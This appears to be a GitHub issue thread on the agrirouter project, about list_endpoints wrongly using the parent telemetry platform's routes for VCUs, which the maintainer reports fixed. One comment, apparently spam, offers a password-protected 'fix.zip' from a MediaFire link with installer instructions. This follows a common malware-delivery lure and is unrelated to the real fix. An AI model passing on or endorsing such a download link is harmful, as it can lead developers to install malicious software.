### ISSUE TITLE
[Bug] For VCUs, `List Endpoints` is wrongly processed on behalf of the telemetry platform

### ISSUE THREAD

**Issue by oliverrahner** [DKE-Data/agrirouter#27]
### What happened?

When sending a `dke:list_endpoints` command, the `sensor_alternate_id` is not honored. Instead, the result is always based on the routes set on the parent telemetry platform endpoint.

This is not relevant for `dke:list_endpoints_unfiltered`, because the response is independent of the requesting endpoint.

Fix is estimated to be provided 27 August.

### agrirouter SDK

No SDK

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oliverrahner** [comment]
Bug should be fixed on QA now

**Comment by oliverrahner** [comment]
Original reporter confirmed bug fixed!
